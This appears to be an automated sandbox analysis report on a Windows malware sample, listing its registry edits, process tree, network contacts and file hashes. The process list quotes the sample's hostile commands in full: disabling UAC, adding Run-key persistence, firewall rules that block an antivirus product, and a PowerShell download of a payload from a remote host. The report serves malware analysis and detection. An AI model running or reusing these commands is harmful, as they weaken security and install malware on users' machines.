Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\DefaultIcon C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\ = "URL:TonSite Link" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\DefaultIcon C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\DefaultIcon C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\DefaultIcon C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell\open\command C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell\open C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\URL Protocol C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\shell\open C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell\open C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\URL Protocol C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\shell\open C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tonsite\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe\" -- \"%1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite\DefaultIcon\ = "\"C:\\Users\\Admin\\AppData\\Roaming\\Telegram Desktop\\Telegram.exe,1\"" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tdesktop.tg\shell C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tg\ = "URL:Telegram Link" C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3181990009-820930284-137514597-1000_Classes\tonsite C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\programdata\20250223024202\Agghosts.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\programdata\20250223024202\Agghosts.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 396 wrote to memory of 4412 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 396 wrote to memory of 5056 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\programdata\20250223024202\Agghosts.exe
PID 4412 wrote to memory of 2056 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\reg.exe
PID 396 wrote to memory of 5048 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\System32\reg.exe
PID 396 wrote to memory of 1500 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 396 wrote to memory of 2524 N/A C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe C:\Windows\system32\cmd.exe
PID 1500 wrote to memory of 2928 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\chcp.com
PID 2524 wrote to memory of 4544 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1500 wrote to memory of 1580 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2524 wrote to memory of 4556 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 4832 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 3936 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 3316 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 2792 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 3968 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 2524 wrote to memory of 2380 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1500 wrote to memory of 4084 N/A C:\Windows\system32\cmd.exe C:\Users\Public\Videos\bin.exe
PID 4084 wrote to memory of 1712 N/A C:\Users\Public\Videos\bin.exe C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp
PID 1712 wrote to memory of 1920 N/A C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe

Processes

C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe

"C:\Users\Admin\AppData\Local\Temp\2025-02-23_f999f60afb55137a3c068a707a421a5f_ryuk.exe"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024202\1.bat" "

C:\programdata\20250223024202\Agghosts.exe

"C:\programdata\20250223024202\Agghosts.exe"

C:\Windows\system32\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\System32\reg.exe

"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v GoogleUpdata_Service /d "C:\programdata\lnk\dick.lnk" /f

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Videos\download_and_run.bat" "

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Downloads\20250223024202\fhq.bat" "

C:\Windows\system32\chcp.com

chcp 65001

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access" dir=in action=block program="" enable=yes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object System.Net.WebClient).DownloadFile('https://baba-1336130708.cos.ap-tokyo.myqcloud.com/tsetup-x64.5.11.1.exe', 'C:\Users\Public\Videos\bin.exe')"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access" dir=out action=block program="" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access2" dir=in action=block program="safemon\360tray.exe=360Safe.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="Block Program Network Access2" dir=out action=block program="safemon\360tray.exe=360Safe.exe" enable=yes

C:\Windows\system32\netsh.exe

netsh advfirewall set allprofiles state on

C:\Windows\system32\netsh.exe

netsh advfirewall set privateprofile settings inboundusernotification disable

C:\Windows\system32\netsh.exe

netsh advfirewall set publicprofile settings inboundusernotification disable

C:\Windows\system32\netsh.exe

netsh advfirewall set domainprofile settings inboundusernotification disable

C:\Users\Public\Videos\bin.exe

"C:\Users\Public\Videos\bin.exe"

C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp

"C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp" /SL5="$1301F8,46193823,827904,C:\Users\Public\Videos\bin.exe"

C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe

"C:\Users\Admin\AppData\Roaming\Telegram Desktop\Telegram.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 baba-1336130708.cos.ap-tokyo.myqcloud.com udp
JP 43.128.240.48:443 baba-1336130708.cos.ap-tokyo.myqcloud.com tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.27.10:443 g.bing.com tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.28.10:443 tse1.mm.bing.net tcp
N/A 127.0.0.1:56118 tcp
US 8.8.8.8:53 www.baidu.com udp
CN 103.235.47.188:80 www.baidu.com tcp
US 8.8.8.8:53 spoutry.it.com udp
JP 118.107.15.176:8081 spoutry.it.com tcp
NL 149.154.167.51:443 tcp
NL 95.161.76.100:443 tcp
NL 149.154.167.51:80 149.154.167.51 tcp
NL 95.161.76.100:80 95.161.76.100 tcp
US 8.8.8.8:53 td.telegram.org udp
NL 149.154.167.99:443 td.telegram.org tcp
NL 149.154.167.91:443 tcp
NL 149.154.167.91:80 149.154.167.91 tcp
SG 149.154.171.5:443 tcp
US 8.8.8.8:53 dns.google.com udp
SG 149.154.171.5:80 149.154.171.5 tcp
US 8.8.8.8:443 dns.google.com tcp
NL 95.161.76.101:443 tcp

Files

C:\ProgramData\20250223024202\Agghosts.exe

MD5 2a24dcd41bc3c5b5f7eceda525786578
SHA1 7e898f9ee5a97a1a261326f0168e8de44dcf8af4
SHA256 169e9e4b23878035551455f4e5dbd01ece204e59fe75361680e8786998059ca7
SHA512 aaded4c72d3fa77eefd9d4b098288dd6923bd79813466d93313d6acb00fea9bb90248fff92cc89a625c60ae3b7cc1c27e8bb178fdac624ec896267da57b9fd6a

C:\Users\Public\Downloads\20250223024202\1.bat

MD5 fa42ebb1071abc0e618c296ea2cf71a6
SHA1 9e0c0737b0e37b3e821d011eecd9b0c7c9f2a15a
SHA256 395f835731d25803a791db984062dd5cfdcade6f95cc5d0f68d359af32f6258d
SHA512 0ed9919675c224201996caeeecf625a1db00a70af5d3ba135dc3d6fa16bfcc562426c813e21b4e861f04d312635be3528d79b5c49b23e78161f2b051fa9aaf05

C:\programdata\20250223024202\libcef.dll

MD5 b7f8c3416cdfd6f46c790da064f66099
SHA1 d7ae9a3d49bbf1981e7d6604128e18b6cd160bd6
SHA256 b9edf03447cf402e24da384c146c9d1536871a47518c795c4aea6550e3abd94d
SHA512 24272954e57f4f4f81dad90469e84946549e3441ba599f8b819d069b803687b3da35f449c0f18755352dba208d6d63af1d6b53c0a56adbd36540b1537bb99dc7

C:\ProgramData\lnk\2.lnk

MD5 97dd1e75e3378d3e5f4cb676787df4c5
SHA1 9050ff87b70c2d534c1218113a3f5e3d971b4d90
SHA256 fc567936880543449bfc3c148219e3332db05554a2bfee030cade8f0ecc6b4ee
SHA512 acf35d67939ff0281e66b1b281197a815eb932b79c18d121ec68a366509fd3aade0bde257ba0d22e9396b172d2a6915cc000a2e961fa701e9586b09d46e17655

C:\programdata\20250223024202\Ensup.log

MD5 2fd94f6e1d71454d716a126f0d7450ac
SHA1 5d966df95c741880089e9078af921a22216516ec
SHA256 a599cbb05b69328655a7a0afc2644ed607c30a05edfb8fd6be2ea920c25b54b5
SHA512 340107b69fc49b8fe1acf37a3a6e40c4b7206cf3ae069fea6f4ba702a733401e1feef55e1d858b3529764bcd0ba371ef552f5838444b65b62545e1da150f9bb2

C:\Users\Public\Videos\download_and_run.bat

MD5 a90ccfd040d774b547f7d258b8e03661
SHA1 c46e353d34723f9393482974a516d51dfb52440d
SHA256 d852cfc4107e9ce5bec7349ef180366bbb4fe0878e725325a2b844f93a1ac1e2
SHA512 bdc816781c44b6e9bbc8207a3c0466a45397cf7815f267add21abe243bf138b5bae7ffec867433bf249e139b726413f68b7002f541c89ae1a25bd1e6980abfd7

C:\Users\Public\Downloads\20250223024202\fhq.bat

MD5 3a7cb580bd340505f6dc5b4c829a3eca
SHA1 21cc730517d74fa1d13316d7e0d817f3bd710906
SHA256 1c1528b546aa29be6614707cbe408cb4b46e8ed05bf3fe6b388b9f22a4ee37e2
SHA512 c224fa676542b90f8fc990e574028af664dced61612855290fb23ce4acad2d6b9043e901365939106b591b6746b3e4ddada15eede88a947051e9d8083194e630

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_h1zfqu1i.rz5.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Public\Videos\bin.exe

MD5 06eaa3263801f4d695c3727834ffbca5
SHA1 58031db0039cf00a1fe738e55ee2fca35558c4fd
SHA256 97969d6e01ee37a16f4f7f64e6166f169bedfe95190f48d426693d4b95e8e8ff
SHA512 7b03899c6ce403172eb6d159e142b8ac25ef3aa6eb7f56abd205657d13832eb5b8ee61408b8d7a6f3f1c57de7fcc2565ce2ce9ecb4e54611f4c48098a870b6b3

C:\Users\Admin\AppData\Local\Temp\is-DUQG5.tmp\bin.tmp

MD5 2e90747fe82d7271fbe97ea022fd5173
SHA1 6164bc0ec0c908e9159a0c5d558945d7974e11c1
SHA256 bbec6b26c13b8ebfd01789a8248c6a45646134daf1ef998dbb885ec59157e6b4
SHA512 d9a797861f8a7fc966a0a00e1719734a23c95c39aca9d70322d09274119267c8bd0d86a3ec468a7f493422769f89a48469f1e33a6a1dd2d39cb30cfb4df6fa44

C:\Users\Admin\AppData\Roaming\Telegram Desktop\modules\x64\d3d\d3dcompiler_47.dll

MD5 a7349236212b0e5cec2978f2cfa49a1a
SHA1 5abb08949162fd1985b89ffad40aaf5fc769017e
SHA256 a05d04a270f68c8c6d6ea2d23bebf8cd1d5453b26b5442fa54965f90f1c62082
SHA512 c7ff4f9146fefedc199360aa04236294349c881b3865ebc58c5646ad6b3f83fca309de1173f5ebf823a14ba65e5ada77b46f20286d1ea62c37e17adbc9a82d02
